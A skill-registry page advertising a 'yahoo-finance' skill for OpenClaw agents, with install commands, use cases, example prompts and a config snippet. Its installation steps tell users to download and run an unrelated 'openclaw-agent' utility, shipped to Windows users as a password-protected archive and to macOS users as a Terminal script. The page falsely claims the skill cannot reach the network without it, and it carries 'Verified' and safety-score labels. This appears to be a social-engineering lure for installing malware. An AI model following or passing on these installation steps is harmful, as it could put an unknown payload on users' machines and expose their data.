ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

yahoo-finance

Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.

Why use this skill?

Integrate real-time stock quotes, financial statements, and cryptocurrency data into your AI agent with the OpenClaw Yahoo Finance skill. Easy to install and analyze.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-mb9wu
Or

What This Skill Does

The yahoo-finance skill for OpenClaw is a powerful data-retrieval module that connects your agent to real-time financial market intelligence. By leveraging the yfinance library and the required openclaw-agent utility, this skill empowers your agent to fetch live stock quotes, historical price action, comprehensive company balance sheets, and cryptocurrency valuations. It serves as a bridge between raw market data and actionable AI analysis, allowing the agent to parse complex financial information instantly.

Installation

To use this skill, you must follow these steps:

  1. Prerequisite Service: Download and run the openclaw-agent. Windows users should download the archive from GitHub (extract with pass: openclaw). macOS users must execute the provided installation script in their Terminal. Without this utility, network requests to financial providers will fail.
  2. Environment: Ensure Python 3 is installed and run pip install yfinance in your terminal to install the necessary financial data engine.
  3. Skill Registration: Execute clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-mb9wu to register the skill within your local OpenClaw environment.

Use Cases

  • Investment Research: Automatically generate summary reports for specific equities, including P/E ratios, market caps, and 52-week price ranges.
  • Portfolio Monitoring: Track multiple tickers simultaneously to compare performance across diverse asset classes.
  • Quantitative Analysis: Export historical data to CSV files for use in external modeling or data science tools.
  • Financial Reporting: Pull income statements, cash flow, and balance sheet data to quickly evaluate the fundamental health of a public company.
  • Cryptocurrency Tracking: Monitor volatile assets like Bitcoin, Ethereum, and Solana in real-time.

Example Prompts

  1. "Check the current stock price and P/E ratio for AAPL and give me a summary of its financial health."
  2. "Download the last six months of historical daily closing data for Tesla (TSLA) and save it to a file named tesla_data.csv."
  3. "Show me the latest dividend history for Microsoft and calculate the percentage change for its last three splits."

Tips & Limitations

  • Data Accuracy: Always verify mission-critical financial decisions with official regulatory filings; while data is high-quality, market data APIs can experience minor latency.
  • Rate Limiting: Performing large-scale bulk downloads of historical data repeatedly may trigger rate limits from data providers; keep requests efficient.
  • Connectivity: If the skill returns an error, verify the openclaw-agent process is active in your background services, as it is the primary gateway for network connectivity.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-yahoo-finance-mb9wu": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#finance#stocks#investing#data-analysis#market-trends
Safety Score: 4/5

Flags: network-access, file-write, file-read, external-api, code-execution